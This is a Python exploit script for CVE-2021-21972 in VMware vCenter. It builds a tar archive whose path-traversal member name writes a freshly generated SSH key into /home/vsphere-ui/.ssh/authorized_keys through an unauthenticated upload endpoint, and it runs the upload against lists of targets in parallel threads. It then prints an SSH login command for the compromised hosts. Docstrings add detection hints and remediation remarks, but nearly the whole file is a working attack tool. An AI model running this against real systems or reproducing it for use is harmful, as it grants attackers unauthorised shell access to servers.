CVE-2021-21972.py
import requests, optparse, concurrent.futures, sys, functools, itertools, tarfile, os, shutil
from requests.packages.urllib3.exceptions import InsecureRequestWarning
# Silence urllib3's certificate warnings. Every request in this script is sent
# with verify=False, so the server's TLS certificate is never validated and a
# response could come from an on-path system rather than the intended host.
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
# NOTE(review): called without a category, this presumably silences all urllib3
# HTTP warnings and makes the call above redundant — confirm.
requests.packages.urllib3.disable_warnings()
'''
% python3 /tmp/CVE_2021_21972.py -i /tmp/urls.txt -n 8 -e
[*] Creating tmp.tar containing ../../../../../home/vsphere-ui/.ssh/authorized_keys
[+] https://172.16.164.1 SUCCESS
Login using 'ssh -i id_rsa vsphere-ui@x.x.x.x'
'''
'''
% python3 /tmp/CVE_2021_21972.py -i /tmp/urls.txt -n 8 -c
[+] https://172.16.164.1 is vulnerable to CVE-2021-21972
'''
'''
% python3 /tmp/CVE_2021_21972.py -u https://172.16.164.1 -n 8 -c
[+] https://172.16.164.1 is vulnerable to CVE-2021-21972
'''
# Proxy map handed to every requests.post() call in this script. Both schemes
# point at 127.0.0.1:8080 (presumably a local intercepting proxy — confirm).
# The commented-out empty dict below is the author's alternative setting.
proxies = dict(
    http="http://127.0.0.1:8080",
    https="https://127.0.0.1:8080",
)
#proxies = {}
def CVE_2021_21972(url, filename):
    """POST the archive *filename* to the ``uploadova`` endpoint under *url*.

    The file is sent as the multipart field ``uploadFile`` with content type
    ``application/x-tar``. The request carries no credentials (only
    ``User-Agent`` and ``Accept`` headers) and TLS verification is disabled.

    Detection note: on the server side this shows up as a multipart POST to
    ``/ui/vropspluginui/rest/services/uploadova`` without an authenticated
    session, which is worth alerting on in web access logs.

    Args:
        url: Base URL of the target, with or without a trailing slash.
        filename: Path of the archive to upload.

    Returns:
        ``(url, True)`` when the response body contains ``SUCCESS``,
        otherwise ``(url, False)``. Network errors are not caught here and
        propagate to the caller.
    """
    separator = "" if url.endswith("/") else "/"
    endpoint = url + separator + "ui/vropspluginui/rest/services/uploadova"
    request_headers = {"User-Agent": "Mozilla/5.0", "Accept": "application/json"}
    # NOTE(review): the file object opened here is never explicitly closed.
    upload = {'uploadFile': (filename, open(filename, 'rb'), 'application/x-tar')}
    response = requests.post(
        endpoint,
        proxies=proxies,
        headers=request_headers,
        files=upload,
        verify=False,
        timeout=30,
    )
    return url, "SUCCESS" in response.text
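def checkVuln(url):
    """Probe whether the ``uploadova`` endpoint answers without authentication.

    Sends an empty POST (no file, no credentials) and looks for the error
    message the upload handler returns when the ``uploadFile`` part is missing.
    Seeing that message means the handler processed an unauthenticated
    request, which is the exposure behind CVE-2021-21972.

    Caveats for anyone acting on the result:
      * ``False`` means "not confirmed", not "safe": unreachable hosts,
        timeouts and proxy failures are reported as ``False`` too.
      * TLS verification is disabled, so the answer is only as trustworthy as
        the network path to the host.
      * A patched or mitigated server is expected not to return this message;
        confirm remediation against the vendor advisory for CVE-2021-21972.

    Args:
        url: Base URL of the server, with or without a trailing slash.

    Returns:
        ``(url, True)`` when the marker message is in the response body,
        otherwise ``(url, False)``.
    """
    base = url if url.endswith("/") else url + "/"
    probe_url = base + "ui/vropspluginui/rest/services/uploadova"
    headers = {"User-Agent": "Mozilla/5.0", "Accept": "application/json"}
    try:
        s = requests.post(probe_url, proxies=proxies, headers=headers, verify=False, timeout=30)
    except requests.exceptions.RequestException:
        # The original caught only ReadTimeout, so a single refused connection,
        # DNS failure, proxy error or malformed URL raised out of the worker
        # and aborted the whole sweep. RequestException is the common base of
        # all of these (ReadTimeout included).
        return url, False
    marker = "Required CommonsMultipartFile parameter 'uploadFile' is not present"
    return url, marker in s.text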
def createTar():
    """Generate an SSH key pair and build ``tmp.tar`` for the upload request.

    Works entirely in the current directory: removes any existing ``id_rsa``,
    runs ``ssh-keygen``, copies ``id_rsa`` to ``authorized_keys`` and adds that
    file to the archive under a member name made of ``../`` segments.

    Defensive takeaways from this block:
      * The archive member name is what carries the path traversal. Code that
        extracts uploaded archives must reject or normalise member names that
        contain ``..`` or are absolute before writing anything to disk.
      * An unexpected change to ``/home/vsphere-ui/.ssh/authorized_keys`` on
        the server is a strong indicator to alert on.

    Returns:
        The archive file name, ``tmp.tar``.
    """
    # Remove a key left over from an earlier run (presumably so ssh-keygen
    # does not stop to ask about overwriting it).
    if os.path.exists("id_rsa"):
        os.remove("id_rsa")
    # Fixed command string with no caller-supplied data; -N '' sets an empty
    # passphrase and -q suppresses output. The exit status is not checked.
    cmd = "ssh-keygen -t rsa -f id_rsa -q -N ''"
    os.system(cmd)
    shutil.copyfile("id_rsa", "authorized_keys")
    # Member name stored in the archive; the leading "../" segments climb out
    # of whatever directory the archive is extracted into.
    tmpPath="../../../../../home/vsphere-ui/.ssh/authorized_keys"
    fname="tmp.tar"
    print("[*] Creating " + fname + " containing " + tmpPath)
    # Mode "a" appends: a tmp.tar left by an earlier run is kept and extended.
    tf = tarfile.open(fname, "a")
    tf.add("authorized_keys", tmpPath)
    tf.close()
    return(fname)
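# Command-line handling and dispatch. This runs at module level, so importing
# the file parses sys.argv and acts on it.
parser = optparse.OptionParser()
parser.add_option('-i',action="store", dest="file", help="file containing list of urls")
parser.add_option('-u', '--url', action="store", dest="url", help="https://1.1.1.1")
parser.add_option('-f', action="store", dest="filename")
parser.add_option('-n', action="store", dest="noOfThreads")
parser.add_option('-e', '--exploit', action="store_true")
parser.add_option('-c', '--check', action="store_true")
options, remainder = parser.parse_args()

# The archive is only needed in --exploit mode: use the one given with -f,
# otherwise build one.
if options.exploit:
    filename = options.filename if options.filename else createTar()

# Worker count for the thread pool; defaults to 4 when -n is absent.
noOfThreads = int(options.noOfThreads) if options.noOfThreads else 4

# Collect targets from -u and -i. The original replaced the list when -i was
# given, silently dropping the -u URL, and kept blank lines from the file as
# empty URLs that later failed inside the workers.
urlList = []
if options.url:
    urlList.append(options.url)
if options.file:
    with open(options.file) as f:
        urlList.extend(line.strip() for line in f if line.strip())

if not options.check and not options.exploit:
    print("[-] Please choose either the --exploit or --check option")

if options.check:
    with concurrent.futures.ThreadPoolExecutor(max_workers=noOfThreads) as executor:
        # executor.map yields (url, bool) pairs in input order.
        for res in executor.map(checkVuln, urlList):
            if res[1]:
                print("[+] "+res[0]+" is vulnerable to CVE-2021-21972")

if options.exploit:
    # The original initialised a misspelt name ("sucess"), so the final test
    # raised NameError whenever no target reported success.
    success = False
    with concurrent.futures.ThreadPoolExecutor(max_workers=noOfThreads) as executor:
        for res in executor.map(CVE_2021_21972, urlList, itertools.repeat(filename)):
            if res[1]:
                print("[+] "+res[0]+" SUCCESS ")
                success = True
    if success:
        print("\nLogin using 'ssh -i id_rsa vsphere-ui@x.x.x.x'")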